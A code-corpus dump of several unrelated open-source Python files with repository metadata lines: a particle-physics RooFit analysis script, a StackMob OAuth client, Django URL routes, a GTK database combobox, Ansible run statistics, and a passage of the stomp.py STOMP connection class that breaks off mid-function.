hist = ROOT.TH1F('h{0}hist{1}'.format(int(tree.target),ind),"hist",bins,low,high)
adaptivehists[int(tree.target)].append(hist)
# if (i%1000==0):
# print ' entry ', i , ' mx = ', tree.mx, ' target = ', tree.target, ' ind = ',ind,var_points[0],var_points[1]
# fill the histogram
adaptivehists[int(tree.target)][ind].Fill(tree.MLP)
i=i+1
# sort them by the var_points
for target in 0,1:
var_points[target], adaptivehists[target] = zip(*sorted(zip(var_points[target],adaptivehists[target])))
print var_points
print adaptivehists
# build RooWorld stuff
w = ROOT.RooWorkspace('w')
w.factory('mx[{0},{1}]'.format( var_points[0][0],var_points[0][len(var_points[0])-1]))
w.factory('score[{0},{1}]'.format(low,high))
s = w.var('score')
mu = w.var('mx')
adpativedatahists=[[],[]]
adpativehistpdfs=[[],[]]
for target in 0,1:
for ind in range(0,len(var_points[target])):
print "Building RooWorld stuff for target",target," index ",ind
print " mx = ", var_points[target][ind], " mean = ", adaptivehists[target][ind].GetMean(), " rms = ", adaptivehists[target][ind].GetRMS()
datahist = ROOT.RooDataHist('dh{0}datahist{1}'.format(target,ind),"hist",
ROOT.RooArgList(s), adaptivehists[target][ind])
order=1
s.setBins(bins)
histpdf = ROOT.RooHistPdf('hp{0}histpdf{1}'.format(target,ind),"hist",
ROOT.RooArgSet(s), datahist,order)
histpdf.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
getattr(w,'import')(datahist) # work around for morph = w.import(morph)
getattr(w,'import')(histpdf) # work around for morph = w.import(morph)
adpativedatahists[target].append(datahist)
adpativehistpdfs[target].append(histpdf)
w = makeBSpline(w,mu,s,adpativehistpdfs[target], var_points[target], 'm{0}morph'.format(target))
morph = w.pdf('m{0}morph'.format(target))
morph.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
print morph
# make dataset, add to workspace
w.factory('mwwbb[500,7000]')
w.factory('mx[350,1600]')
w.factory('target[-1,2]')
w.defineSet('inputvars','mwwbb,mx')
w.defineSet('treevars','mwwbb,mx,target')
w.defineSet('obsvars','mwwbb')
alldata = ROOT.RooDataSet('alldata','',tree, w.set('treevars'))
alldata.Print()
toydata = alldata.reduce(ROOT.RooFit.Cut('mx==1000.'))
toydata.Print()
obsdata = toydata.reduce(ROOT.RooFit.SelectVars(w.set('obsvars')))
obsdata.Print()
obsdata = ROOT.RooDataSet('obsdata','',tree, w.set('obsvars'))
getattr(w,'import')(alldata)
getattr(w,'import')(obsdata)
w.Print()
w.writeToFile("workspace_adaptive_tree.root")
def createPdfForAdaptive():
f = ROOT.TFile("ttbar_14tev_jes1_eval.root")
nt = f.Get("nto")
createPdfForAdaptive_tree(nt)
def plotScore():
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
inputVars = ROOT.RooArgList(w.set('inputvars'))
inputVars.Print()
nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml")
frame = w.var('mwwbb').frame()
for x in np.linspace(400,1600,20):
w.var('mx').setVal(x)
nn.plotOn(frame)
c1 = ROOT.TCanvas("c2",'',400,400)
frame.Draw()
c1.SaveAs('tmva.pdf')
frame = w.var('mx').frame()
w.var('mwwbb').setVal(800)
for x in np.linspace(400,1600,20):
w.var('mwwbb').setVal(x)
nn.plotOn(frame)
frame.Draw()
c1.SaveAs('tmva_vs_mx.pdf')
def plotAdaptive():
'''
make plots of the output of the parametrized model
'''
#import class code should work automatically, but confused by namespace
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
c1 = ROOT.TCanvas("c2",'',400,400)
frame = w.var('score').frame()
c1.SetLogy();
for val in np.linspace(400,1500,100):
w.var('mx').setVal(val)
w.pdf('m1morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('m0morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kBlue))
frame.Draw()
c1.SaveAs('root_bspline.pdf')
def fitAdaptive():
#ugh, tough b/c fixed data are the features, not the NN output
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
ROOT.gROOT.ProcessLine('.L CompositeFunctionPdf.cxx+')
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
w.Print()
w.factory('CompositeFunctionPdf::sigtemplate(fm0morphfunc)')
w.factory('CompositeFunctionPdf::bkgtemplate(fm1morphfunc)')
w.factory('Uniform::baseline(score)')
w.factory('SUM::template(sigfrac[0,1]*sigtemplate,const[0.01]*baseline,bkgtemplate)')
mu = w.var('mx')
mu.setVal(0)
c1 = ROOT.TCanvas('c1')
sframe = w.var('score').frame()
w.pdf('sigtemplate').plotOn(sframe)
w.pdf('m0morph').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kGreen))
w.pdf('m1morph').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('sigtemplate').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kGreen))
w.pdf('bkgtemplate').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('template').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kBlack))
w.pdf('template').plotOn(sframe,ROOT.RooFit.Components('sigtemplate'),ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('template').plotOn(sframe,ROOT.RooFit.Components('bkgtemplate'),ROOT.RooFit.LineColor(ROOT.kGreen))
sframe.Draw()
c1.SaveAs('template.pdf')
#create a dataset for
data = w.data('obsdata')
data.Print()
#need a RooAbsReal to evaluate NN(x,mu)
#nn = ROOT.TMVAWrapper('nn','nn',x,mu)
print "make RooArgSet"
print "create TMVAWrapper "
inputVars = ROOT.RooArgList(w.set('inputvars'))
inputVars.Print()
nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml")
#weightfile = "TMVARegression_alphavary.root_MLP.weights.xml"
print "about to import"
print "get val = ", nn.getVal()
getattr(w,'import')(ROOT.RooArgSet(nn),ROOT.RooFit.RecycleConflictNodes())
w.Print()
print "ok, almost done"
#create nll based on pdf(NN(x,mu) | mu)
w.factory('EDIT::pdf(template,score=nn)')
#w.factory('EDIT::pdf(pdftemp,mu=mx)')
#resetting mu->mux dies.
#w.factory('EDIT::pdf(template,score=nn,mu=mx)')
#wory that DataHist & HistPdf observable not being reset
pdf = w.pdf('pdf')
print 'pdf has expected events = ', pdf.expectedEvents(ROOT.RooArgSet(nn))
w.Print()
pdf.graphVizTree('pdf2bTMVA.dot')
mu = w.var('mx')
mu.setConstant(False)
mu.Print()
#construct likelihood and plot it
nll = pdf.createNLL(data)
#nll = pdf.createNLL(data,ROOT.RooFit.Extended(False))
#restrict NLL to relevant region in mu
#frame=mu.frame(-.7,.7)
frame=mu.frame()
nll.plotOn(frame, ROOT.RooFit.ShiftToZero())
frame.SetMinimum(0)
frame.SetMaximum(10)
frame.Draw()
c1.SaveAs('fitAdaptiveTMVA.pdf')
pdf.fitTo(data,ROOT.RooFit.Extended(False))
return
def makeBSpline(w,interpParam, observable, pdfList, paramPoints,name='morph',):
'''
The helper function to create the parametrized model that interpolates
across input pdfs
'''
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
paramVec = ROOT.TVectorD(len(paramPoints))
tValues = ROOT.std.vector("double")()
for i, p in enumerate(paramPoints):
paramVec[i]=p #seems silly, but other constructor gave problems
tValues.push_back(p)
order=3
bspb = ROOT.RooStats.HistFactory.RooBSplineBases( "bases", "bases", order, tValues, interpParam )
pdfs = ROOT.RooArgList()
for pdf in pdfList:
pdfs.add(pdf)
#this makes a function
morphfunc = ROOT.RooStats.HistFactory.RooBSpline( 'f'+name+'func', "morphfunc", pdfs, bspb, ROOT.RooArgSet() )
#if you want to convert it into a PDF
morph = ROOT.RooRealSumPdf(name,name, ROOT.RooArgList(morphfunc), ROOT.RooArgList())
print morph
#getattr(w,'import')(morph) # work around for morph = w.import(morph)
getattr(w,'import')(ROOT.RooArgSet(morph),ROOT.RooFit.RecycleConflictNodes()) # work around for morph = w.import(morph)
w.importClassCode()
return w
if __name__ == '__main__':
'''
The main function that calls the individual steps of the procedure
'''
plotScore()
#createPdfForAdaptive()
#plotAdaptive()
#fitAdaptive()
| cranmer/parametrized-learning | ttbar_resonance.py | Python | bsd-2-clause | 11,616 | 0.037965 |
import oauth.oauth as oauth
import httplib
import json
import sys
class BaseClient:
def __init__(self, baseURL, key, secret):
self.url = baseURL
self.connection = httplib.HTTPConnection(baseURL)
self.consumer = oauth.OAuthConsumer(key, secret)
def _execute(self, httpmethod, path, body):
request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_method=httpmethod, http_url="http://" + self.url + "/" + path)
request.sign_request(oauth.OAuthSignatureMethod_HMAC_SHA1(), self.consumer, None)
headers = request.to_header()
headers["Content-Type"] = "application/json"
headers["Accept"] = "application/vnd.stackmob+json; version=0"
self.connection.set_debuglevel(1)
bodyString = ""
if(body != None):
bodyString = json.dumps(body)
self.connection.request(request.http_method, "/"+path, body=bodyString, headers=headers)
return self.connection.getresponse()
def get(self, path):
self._execute("GET", path, None)
def post(self, path, body):
self._execute("POST", path, body)
def put(self, path, body):
self._execute("PUT", path, body)
def delete(self, path):
self._execute("DELETE", path, None)
class APIClient(BaseClient):
def __init__(self, key, secret):
super.__init__("api.mob1.stackmob.com", key, secret)
class PushAPIClient(BaseClient):
def __init__(self, key, secret):
super.__init__("push.mob1.stackmob.com", key, secret)
| stackmob/stackmob-python-examples | stackmob/client.py | Python | apache-2.0 | 1,397 | 0.030064 |
from django.conf.urls.defaults import patterns, include, url
from django.utils.functional import curry
from django.views.defaults import server_error, page_not_found
from tracker.api import MemberResource, ReportResource
from tastypie.api import Api
v1_api = Api(api_name='v1')
v1_api.register(MemberResource())
v1_api.register(ReportResource())
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
handler500 = curry(server_error, template_name='admin/500.html')
handler404 = curry(page_not_found, template_name='admin/404.html')
urlpatterns = patterns('tracker.views',
# Examples:
# url(r'^$', 'socialcongress.views.home', name='home'),
url(r'^admin/_update$', 'update', name="update"),
url(r'^admin/chamber/(?P<chamber>[-a-z]+)/$', 'chamber_csv', name='admin_chamber_csv'),
url(r'^admin/weekly/chamber/(?P<chamber>[-a-z]+)/$', 'weekly_csv', name='admin_weekly_csv'),
#url(r'^reports/weeks/$', 'week_index', name='week_index'),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# API urls
url(r'^api/', include(v1_api.urls)),
)
| dwillis/socialcongress | tracker/urls.py | Python | unlicense | 1,173 | 0.00682 |
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2008 EVO Sistemas Libres <[email protected]>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# dbcombobox
# Database gtk.ComboBox widget module
###############################################################################
# GTK Imports
import gobject, gtk
# DBWidget base class
from dbwidgetbase import DBWidgetBase
class DBComboBox(gtk.ComboBox,DBWidgetBase):
"""
Database gtk.ComboBox widget
"""
__gtype_name__ = 'DBComboBox'
# Widget properties
__properties = {
'choices' : (gobject.TYPE_STRING,'Choices','Separated values of choice for the widget (separator character is used as separator)','',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
'separator-char' : (gobject.TYPE_STRING,'Separator','Separator character used to separate choice values',',',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
}
__properties.update(DBWidgetBase._DBWidgetBase__properties)
__gproperties__ = __properties
def __init__(self,*args,**kwargs):
"""
Class initialization
"""
# Initialize DBWidget base class
DBWidgetBase.__init__(self,*args,**kwargs)
# Initialize parent widget
gtk.ComboBox.__init__(self)
# List store for data
self.__liststore = gtk.ListStore(str,gtk.gdk.Pixbuf)
self.set_model(self.__liststore)
# Cell renderers for combobox
crt = gtk.CellRendererText()
self.pack_start(crt, True)
self.add_attribute(crt, 'text', 0)
crp = gtk.CellRendererPixbuf()
crp.set_property('xalign',1)
self.pack_start(crp, True)
self.add_attribute(crp, 'pixbuf', 1)
# Blank and error pixbufs
self.__blankpixbuf=gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,True,8,1,1)
self.__errorpixbuf=self.render_icon(gtk.STOCK_DIALOG_ERROR, gtk.ICON_SIZE_MENU)
# Widget properties
if self.inmediate_validation:
self.connect('changed',self.validate)
def get_widget_data(self):
"""
Returns widget data
"""
iter=self.get_active_iter()
if iter:
return self.__liststore.get_value(iter,0)
else:
return None
def set_invalidated(self):
"""
Set this widget as invalidated
"""
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
iter=self.get_active_iter()
if iter:
self.__liststore.set_value(iter,1,self.__errorpixbuf)
def set_validated(self):
"""
Set this widget as validated
"""
self.__validationerrors=[]
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
def do_get_property(self, property):
"""
Property getting value handling
"""
if property.name=='choices':
return self.choices
elif property.name=='separator-char':
return self.separator_char
else:
return DBWidgetBase.do_get_property(self, property)
def do_set_property(self, property, value):
"""
Property setting value handling
"""
if property.name=='choices':
self.choices=value
# Set values
self.__liststore.clear()
if value:
for choice in value.split(self.separator_char):
self.__liststore.append([choice,self.__blankpixbuf])
self.set_active(0)
elif property.name=='separator-char':
self.separator_char=value
else:
DBWidgetBase.do_set_property(self, property, value)
gobject.type_register(DBComboBox) | R3v1L/evogtk | evogtk/gui/widgetlib/dbcombobox.py | Python | mit | 4,770 | 0.012159 |
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.utils.vars import merge_hash
class AggregateStats:
''' holds stats about per-host activity during playbook runs '''
def __init__(self):
self.processed = {}
self.failures = {}
self.ok = {}
self.dark = {}
self.changed = {}
self.skipped = {}
# user defined stats, which can be per host or global
self.custom = {}
def increment(self, what, host):
''' helper function to bump a statistic '''
self.processed[host] = 1
prev = (getattr(self, what)).get(host, 0)
getattr(self, what)[host] = prev+1
def summarize(self, host):
''' return information about a particular host '''
return dict(
ok = self.ok.get(host, 0),
failures = self.failures.get(host, 0),
unreachable = self.dark.get(host,0),
changed = self.changed.get(host, 0),
skipped = self.skipped.get(host, 0)
)
def set_custom_stats(self, which, what, host=None):
''' allow setting of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom:
self.custom[host] = {which: what}
else:
self.custom[host][which] = what
def update_custom_stats(self, which, what, host=None):
''' allow aggregation of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom or which not in self.custom[host]:
return self.set_custom_stats(which, what, host)
# mismatching types
if type(what) != type(self.custom[host][which]):
return None
if isinstance(what, dict):
self.custom[host][which] = merge_hash(self.custom[host][which], what)
else:
# let overloaded + take care of other types
self.custom[host][which] += what
| alvaroaleman/ansible | lib/ansible/executor/stats.py | Python | gpl-3.0 | 2,779 | 0.009356 |
import math
import random
import re
import socket
import sys
import threading
import time
import types
import xml.dom.minidom
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
import ssl
from ssl import SSLError
DEFAULT_SSL_VERSION = ssl.PROTOCOL_SSLv3
except ImportError: # python version < 2.6 without the backported ssl module
ssl = None
class SSLError:
pass
DEFAULT_SSL_VERSION = None
try:
from socket import SOL_SOCKET, SO_KEEPALIVE
from socket import SOL_TCP, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT
LINUX_KEEPALIVE_AVAIL=True
except ImportError:
LINUX_KEEPALIVE_AVAIL=False
import exception
import listener
import utils
from backward import decode, encode, hasbyte, pack, socksend, NULL
try:
import uuid
except ImportError:
from backward import uuid
try:
from fractions import gcd
except ImportError:
from backward import gcd
import logging
log = logging.getLogger('stomp.py')
class Connection(object):
"""
Represents a STOMP client connection.
"""
# ========= PRIVATE MEMBERS =========
# List of all host names (unqualified, fully-qualified, and IP
# addresses) that refer to the local host (both loopback interface
# and external interfaces). This is used for determining
# preferred targets.
__localhost_names = [ "localhost", "127.0.0.1" ]
try:
__localhost_names.append(socket.gethostbyname(socket.gethostname()))
except:
pass
try:
__localhost_names.append(socket.gethostname())
except:
pass
try:
__localhost_names.append(socket.getfqdn(socket.gethostname()))
except:
pass
#
# Used to parse the STOMP "content-length" header lines,
#
__content_length_re = re.compile('^content-length[:]\\s*(?P<value>[0-9]+)', re.MULTILINE)
def __init__(self,
host_and_ports = [ ('localhost', 61613) ],
user = None,
passcode = None,
prefer_localhost = True,
try_loopback_connect = True,
reconnect_sleep_initial = 0.1,
reconnect_sleep_increase = 0.5,
reconnect_sleep_jitter = 0.1,
reconnect_sleep_max = 60.0,
reconnect_attempts_max = 3,
use_ssl = False,
ssl_key_file = None,
ssl_cert_file = None,
ssl_ca_certs = None,
ssl_cert_validator = None,
wait_on_receipt = False,
ssl_version = DEFAULT_SSL_VERSION,
timeout = None,
version = 1.0,
strict = True,
heartbeats = (0, 0),
keepalive = None
):
"""
Initialize and start this connection.
\param host_and_ports
a list of (host, port) tuples.
\param prefer_localhost
if True and the local host is mentioned in the (host,
port) tuples, try to connect to this first
\param try_loopback_connect
if True and the local host is found in the host
tuples, try connecting to it using loopback interface
(127.0.0.1)
\param reconnect_sleep_initial
initial delay in seconds to wait before reattempting
to establish a connection if connection to any of the
hosts fails.
\param reconnect_sleep_increase
factor by which the sleep delay is increased after
each connection attempt. For example, 0.5 means
to wait 50% longer than before the previous attempt,
1.0 means wait twice as long, and 0.0 means keep
the delay constant.
\param reconnect_sleep_max
maximum delay between connection attempts, regardless
of the reconnect_sleep_increase.
\param reconnect_sleep_jitter
random additional time to wait (as a percentage of
the time determined using the previous parameters)
between connection attempts in order to avoid
stampeding. For example, a value of 0.1 means to wait
an extra 0%-10% (randomly determined) of the delay
calculated using the previous three parameters.
\param reconnect_attempts_max
maximum attempts to reconnect
\param use_ssl
connect using SSL to the socket. This wraps the
socket in a SSL connection. The constructor will
raise an exception if you ask for SSL, but it can't
find the SSL module.
\param ssl_cert_file
the path to a X509 certificate
\param ssl_key_file
the path to a X509 key file
\param ssl_ca_certs
the path to the a file containing CA certificates
to validate the server against. If this is not set,
server side certificate validation is not done.
\param ssl_cert_validator
function which performs extra validation on the client
certificate, for example checking the returned
certificate has a commonName attribute equal to the
hostname (to avoid man in the middle attacks).
The signature is:
(OK, err_msg) = validation_function(cert, hostname)
where OK is a boolean, and cert is a certificate structure
as returned by ssl.SSLSocket.getpeercert()
\param wait_on_receipt
if a receipt is specified, then the send method should wait
(block) for the server to respond with that receipt-id
before continuing
\param ssl_version
SSL protocol to use for the connection. This should be
one of the PROTOCOL_x constants provided by the ssl module.
The default is ssl.PROTOCOL_SSLv3
\param timeout
the timeout value to use when connecting the stomp socket
\param version
STOMP protocol version (1.0 or 1.1)
\param strict
if true, use the strict version of the protocol. For STOMP 1.1, this means
it will use the STOMP connect header, rather than CONNECT.
\param heartbeats
a tuple containing the heartbeat send and receive time in millis. (0,0)
if no heartbeats
\param keepalive
some operating systems support sending the occasional heart
beat packets to detect when a connection fails. This
parameter can either be set set to a boolean to turn on the
default keepalive options for your OS, or as a tuple of
values, which also enables keepalive packets, but specifies
options specific to your OS implementation
"""
sorted_host_and_ports = []
sorted_host_and_ports.extend(host_and_ports)
#
# If localhost is preferred, make sure all (host, port) tuples that refer to the local host come first in the list
#
if prefer_localhost:
sorted_host_and_ports.sort(key = self.is_localhost)
#
# If the user wishes to attempt connecting to local ports using the loopback interface, for each (host, port) tuple
# referring to a local host, add an entry with the host name replaced by 127.0.0.1 if it doesn't exist already
#
loopback_host_and_ports = []
if try_loopback_connect:
for host_and_port in sorted_host_and_ports:
if self.is_localhost(host_and_port) == 1:
port = host_and_port[1]
if (not ("127.0.0.1", port) in sorted_host_and_ports
and not ("localhost", port) in sorted_host_and_ports):
loopback_host_and_ports.append(("127.0.0.1", port))
#
# Assemble the final, possibly sorted list of (host, port) tuples
#
self.__host_and_ports = []
self.__host_and_ports.extend(loopback_host_and_ports)
self.__host_and_ports.extend(sorted_host_and_ports)
self.__recvbuf = ''
self.__listeners = {}
self.__reconnect_sleep_initial = reconnect_sleep_initial
self.__reconnect_sleep_increase = reconnect_sleep_increase
self.__reconnect_sleep_jitter = reconnect_sleep_jitter
self.__reconnect_sleep_max = reconnect_sleep_max
self.__reconnect_attempts_max = reconnect_attempts_max
self.__timeout = timeout
self.__connect_headers = {}
if user is not None and passcode is not None:
self.__connect_headers['login'] = user
self.__connect_headers['passcode'] = passcode
self.__socket = None
self.__socket_semaphore = threading.BoundedSemaphore(1)
self.__current_host_and_port = None
self.__receiver_thread_exit_condition = threading.Condition()
self.__receiver_thread_exited = False
self.__send_wait_condition = threading.Condition()
self.__connect_wait_condition = threading.Condition()
self.blocking = None
self.connected = False
# setup SSL
if use_ssl and not ssl:
raise Exception("SSL connection requested, but SSL library not found.")
self.__ssl = use_ssl
self.__ssl_cert_file = ssl_cert_file
self.__ssl_key_file = ssl_key_file
self.__ssl_ca_certs = ssl_ca_certs
self.__ssl_cert_validator = ssl_cert_validator
self.__ssl_version = ssl_version
self.__receipts = {}
self.__wait_on_receipt = wait_on_receipt
# protocol version
self.version = version
self.__strict = strict
# setup heartbeating
if version < 1.1 and heartbeats != (0, 0):
raise exception.ProtocolException('Heartbeats can only be set on a 1.1+ connection')
self.heartbeats = heartbeats
# used for 1.1 heartbeat messages (set to true every time a heartbeat message arrives)
self.__received_heartbeat = time.time()
# flag used when we receive the disconnect receipt
self.__disconnect_receipt = None
# function for creating threads used by the connection
self.create_thread_fc = default_create_thread
self.__keepalive = keepalive
def is_localhost(self, host_and_port):
"""
Return true if the specified host+port is a member of the 'localhost' list of hosts
"""
(host, port) = host_and_port
if host in Connection.__localhost_names:
return 1
else:
return 2
def override_threading(self, create_thread_fc):
"""
Override for thread creation. Use an alternate threading library by
setting this to a function with a single argument (which is the receiver loop callback).
The thread which is returned should be started (ready to run)
"""
self.create_thread_fc = create_thread_fc
#
# Manage the connection
#
def start(self):
"""
Start the connection. This should be called after all
listeners have been registered. If this method is not called,
no frames will be received by the connection.
"""
self.__running = True
self.__attempt_connection()
thread = self.create_thread_fc(self.__receiver_loop)
self.__notify('connecting')
def stop(self):
"""
Stop the connection. This is equivalent to calling
disconnect() but will do a clean shutdown by waiting for the
receiver thread to exit.
"""
self.disconnect()
self.__receiver_thread_exit_condition.acquire()
if not self.__receiver_thread_exited:
self.__receiver_thread_exit_condition.wait()
self.__receiver_thread_exit_condition.release()
def get_host_and_port(self):
"""
Return a (host, port) tuple indicating which STOMP host and
port is currently connected, or None if there is currently no
connection.
"""
return self.__current_host_and_port
def is_connected(self):
"""
Return true if the socket managed by this connection is connected
"""
try:
return self.__socket is not None and self.__socket.getsockname()[1] != 0 and self.connected
except socket.error:
return False
#
# Manage objects listening to incoming frames
#
def set_listener(self, name, listener):
"""
Set a named listener on this connection
\see listener::ConnectionListener
\param name the name of the listener
\param listener the listener object
"""
self.__listeners[name] = listener
def remove_listener(self, name):
"""
Remove a listener according to the specified name
\param name the name of the listener to remove
"""
del self.__listeners[name]
def get_listener(self, name):
"""
Return a named listener
\param name the listener to return
"""
if name in self.__listeners:
return self.__listeners[name]
else:
return None
#
# STOMP transmissions
#
def subscribe(self, headers={}, **keyword_headers):
"""
Send a SUBSCRIBE frame to subscribe to a queue
"""
merged_headers = utils.merge_headers([headers, keyword_headers])
required_headers = [ 'destination' ]
if self.version >= 1.1:
required_headers.append('id')
self.__send_frame_helper('SUBSCRIBE', '', merged_headers, required_headers)
def unsubscribe(self, headers={}, **keyword_headers):
"""
Send an UNSUBSCRIBE frame to unsubscribe from a queue
"""
merged_headers = utils.merge_headers([headers, keyword_headers])
self.__send_frame_helper('UNSUBSCRIBE', '', merged_headers, [ ('destination', 'id') ])
def send(self, message='', headers={}, **keyword_headers):
"""
Send a message (SEND) frame
"""
merged_headers = utils.merge_headers([headers, keyword_headers])
if self.__wait_on_receipt and 'receipt' in merged_headers.keys():
self.__send_wait_condition.acquire()
self.__send_frame_helper('SEND', message, merged_headers, [ 'destination' ])
self.__notify('send', headers, message)
# if we need to wait-on-receipt, then block until the receipt frame arrives
if self.__wait_on_receipt and 'receipt' in merged_headers.keys():
receipt = merged_headers['receipt']
while receipt not in self.__receipts:
self.__send_wait_condition.wait()
self.__send_wait_condition.release()
del self.__receipts[receipt]
def ack(self, headers={}, **keyword_headers):
"""
Send an ACK frame, to acknowledge receipt of a message
"""
self.__send_frame_helper('ACK', '', utils.merge_headers([headers, keyword_headers]), [ 'message-id' ])
def nack(self, headers={}, **keyword_headers):
"""
Send an NACK frame, to acknowledge a message was not successfully processed
"""
if self.version < 1.1:
raise RuntimeError('NACK is not supported with 1.0 connections')
self.__send_frame_helper('NACK', '', utils.merge_headers([headers, keyword_headers]), [ 'message-id' ])
def begin(self, headers={}, **keyword_headers):
"""
Send a BEGIN frame to start a transaction
"""
use_headers = utils.merge_headers([headers, keyword_headers])
if not 'transaction' in use_headers.keys():
use_headers['transaction'] = str(uuid.uuid4())
self.__send_frame_helper('BEGIN', '', use_headers, [ 'transaction' ])
return use_headers['transaction']
def abort(self, headers={}, **keyword_headers):
"""
Send an ABORT frame to rollback a transaction
"""
self.__send_frame_helper('ABORT', '', utils.merge_headers([headers, keyword_headers]), [ 'transaction' ])
def commit(self, headers={}, **keyword_headers):
"""
Send a COMMIT frame to commit a transaction (send pending messages)
"""
self.__send_frame_helper('COMMIT', '', utils.merge_headers([headers, keyword_headers]), [ 'transaction' ])
def connect(self, headers={}, **keyword_headers):
"""
Send a CONNECT frame to start a connection
"""
wait = False
if 'wait' in keyword_headers and keyword_headers['wait']:
wait = True
del keyword_headers['wait']
if self.version >= 1.1:
if self.__strict:
cmd = 'STOMP'
else:
cmd = 'CONNECT'
headers['accept-version'] = self.version
headers['heart-beat'] = '%s,%s' % self.heartbeats
else:
cmd = 'CONNECT'
self.__send_frame_helper(cmd, '', utils.merge_headers([self.__connect_headers, headers, keyword_headers]), [ ])
if wait:
self.__connect_wait_condition.acquire()
while not self.is_connected():
self.__connect_wait_condition.wait()
self.__connect_wait_condition.release()
def disconnect_socket(self):
self.__running = False
if self.__socket is not None:
if self.__ssl:
#
# Even though we don't want to use the socket, unwrap is the only API method which does a proper SSL shutdown
#
try:
self.__socket = self.__socket.unwrap()
except Exception:
#
# unwrap seems flaky on Win with the backported ssl mod, so catch any exception and log it
#
_, e, _ = sys.exc_info()
log.warn(e)
elif hasattr(socket, 'SHUT_RDWR'):
try:
self.__socket.shutdown(socket.SHUT_RDWR)
except socket.error:
_, e, _ = sys.exc_info()
log.warn('Unable to issue SHUT_RDWR on socket because of error "%s"' % e)
#
# split this into a separate check, because sometimes the socket is nulled between shutdown and this call
#
if self.__socket is not None:
try:
self.__socket.close()
except socket.error:
_, e, _ = sys.exc_info()
log.warn('Unable to close socket because of error "%s"' % e)
self.__current_host_and_port = None
def disconnect(self, send_disconnect=True, headers={}, **keyword_headers):
"""
Send a DISCONNECT frame to finish a connection
"""
try:
self.__send_frame_helper('DISCONNECT', '', utils.merge_headers([self.__connect_headers, headers, keyword_headers]), [ ])
except exception.NotConnectedException:
_, e, _ = sys.exc_info()
self.disconnect_socket()
raise e
if self.version >= 1.1 and 'receipt' in headers:
self.__disconnect_receipt = headers['receipt']
else:
self.disconnect_socket()
def __convert_dict(self, payload):
"""
Encode a python dictionary as a <map>...</map> structure.
"""
xmlStr = "<map>\n"
for key in payload:
xmlStr += "<entry>\n"
xmlStr += "<string>%s</string>" % key
xmlStr += "<string>%s</string>" % payload[key]
xmlStr += "</entry>\n"
xmlStr += "</map>"
return xmlStr
def __send_frame_helper(self, command, payload, headers, required_header_keys):
"""
Helper function for sending a frame after verifying that a
given set of headers are present.
\param command
the command to send
\param payload
the frame's payload
\param headers
a dictionary containing the frame's headers
\param required_header_keys
a sequence enumerating all required header keys. If an element in this sequence is itself
a tuple, that tuple is taken as a list of alternatives, one of which must be present.
\throws ArgumentError
if one of the required header keys is not present in the header map.
"""
for required_header_key in required_header_keys:
if type(required_header_key) == tuple:
found_alternative = False
for alternative in required_header_key:
if alternative in headers.keys():
found_alternative = True
if not found_alternative:
